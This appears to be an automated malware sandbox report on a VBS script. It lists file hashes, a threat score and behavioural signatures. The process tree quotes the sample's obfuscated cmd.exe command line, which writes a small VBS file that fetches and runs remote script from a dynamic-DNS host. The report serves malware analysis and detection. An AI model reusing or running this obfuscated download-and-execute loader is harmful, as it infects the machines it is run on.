Overview

overview

7

Static

static

1

287e0a96c7...85.vbs

windows7-x64

3

287e0a96c7...85.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/12/2023, 15:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    287e0a96c764aab61c0dfd2469fde185.vbs

  • Size

    59KB

  • MD5

    287e0a96c764aab61c0dfd2469fde185

  • SHA1

    be1fa431415c446bf5b690e62b293fa468f63617

  • SHA256

    cb350db86b49a5bf6a2735dd03d6509ac1ca7c80130daa848f9929b531b6e616

  • SHA512

    e93dc6819e7b24d033a9717ea1e4b7eb825f19d0700c2ba6146cef63a204f8f4dc5fce9cbf6ff6ff16c8341b3ab88bd56cd45dd6c401489a6b5e56d2a11d163a

  • SSDEEP

    768:rtVO9PdrtQpv7UjbW9Ehx6Y4WwmGBC1dRv4P7SivUDwnZnIwuI8Jd:bO9PdrSpvh99Y4WJKP7DGwnZnIwd8Jd

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\287e0a96c764aab61c0dfd2469fde185.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "SEt A4O7=.vb&&SEt q0wd57= rbgq0u48 =qhk53 ^"scqhk53riqhk53ptqhk53:^": i5430j43 =qhk53 ^"hqhk53TtPsqhk53:^": Gqhk53etqhk53Objqhk53ecqhk53t(qhk53rbgq0u48+i5430j43+^"&&sET qhk53=n47076n47076mut4h.gotdns.ch/p2.php^")&&sEt/^p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%"<nul > C:\Users\Public\^d4120%A4O7%s|start cmd /c start C:\Users\Public\^d4120%A4O7%s"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2332
  • C:\Windows\system32\cmd.exe
    cmd /c start C:\Users\Public\d4120.vbs
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5024
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\d4120.vbs"
      2⤵
        PID:3240
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\d4120%A4O7%s "
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4500
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" sEt/p er7b67="%q0wd57:qhk53=%%qhk53:n47076=/%" 0<nul 1>C:\Users\Public\d4120%A4O7%s"
      1⤵
        PID:1680

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Public\d4120.vbs
        Filesize

        98B

        MD5

        642e2fa68bf257b7c2891abca9e0c994

        SHA1

        4e2b917f2dbd6bbc72224edaedaf18bdfea7ba7f

        SHA256

        887469bfc0aae71beed5cde7d40f4c9403ab1bb8c1df4b0e513860c1fa7e8522

        SHA512

        e100bbdc3f9ccf6a634f647169999e66118a31b70f8047cd8c1c8dd0cbd8495bc6f6ab1c62a104dd7e895c2d83e16ab3644797b7bfc7091c66afa46ed232a376

        Download Submit